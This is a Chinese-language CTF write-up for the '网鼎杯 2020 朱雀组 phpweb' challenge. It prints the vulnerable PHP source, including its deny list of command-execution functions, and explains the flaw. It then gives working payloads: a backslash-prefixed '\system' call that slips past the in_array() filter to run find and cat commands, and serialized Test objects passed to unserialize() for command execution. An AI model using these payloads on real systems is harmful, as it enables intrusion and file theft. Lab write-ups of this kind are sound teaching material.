[网鼎杯 2020 朱雀组]phpweb

最新推荐文章于 2025-02-02 17:35:54 发布

原创最新推荐文章于 2025-02-02 17:35:54 发布 · 1.7k 阅读

6 ·

CC 4.0 BY-SA版权

文章标签：

#web #CTF

CTF刷题记录专栏收录该内容

148 篇文章

订阅专栏

考点：关于call_user_func()函数的用法，php反序列化（本题不用也能做），in_array()函数的绕过，命令执行。

解题过程：

打开题目，图片吓我一跳。。。

注意到页面一直在跳转，抓包看看

这个当时是没有头绪的，太菜的我只好去看大佬的wp，发现后端是call_user_func()函数在运作，而传入的参数就是该函数的参数值。

查看index.php，修改post传值的内容

func=file_get_contents&p=index.php

index.php如下

   <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

进行代码审计，大概分析一下该段代码：

首先传入$func和$p，$disable_fun中是一些命令执行关键词，对$func用in_array()进行过滤，然后执行gettime()函数，而gettime()函数中存在call_user_func()函数，会对我们传入的参数进行命令执行，这就是突破点！！！

找payload:

1. 对in_array()函数进行绕过

我们发现，从$func参数传入至执行，只有in_array()进行了过滤，但是我们可以用一个简单的 “\” 进行绕过。本地实验：

<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
	$func = '\system';
	if(!in_array($func,$disable_fun)){
		call_user_func($func, 'echo 121');}
//输出：121

所以in_array()就相当于不存在，进行命令执行（这样的话Test类就没有用上）

func=\system&p=cat $(find / -name flag*)
或者
func=\exec&p=cat $(find / -name flag*)

结果如下：

2. php反序列化

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

然后进行cat 命令抓取flag

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}

或者readfile读取flag文件

func=readfile&p=/tmp/flagoefiu4r93

当然，我们也可以搞一个类似exp的payload，也可以得到flag。

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:25:"cat $(find / -name flag*)";s:4:"func";s:6:"system";}

参考文章：

1. [网鼎杯 2020 朱雀组]phpweb

2. PHP函数详解：call_user_func()使用方法

3. 【网鼎杯 2020 朱雀组】phpweb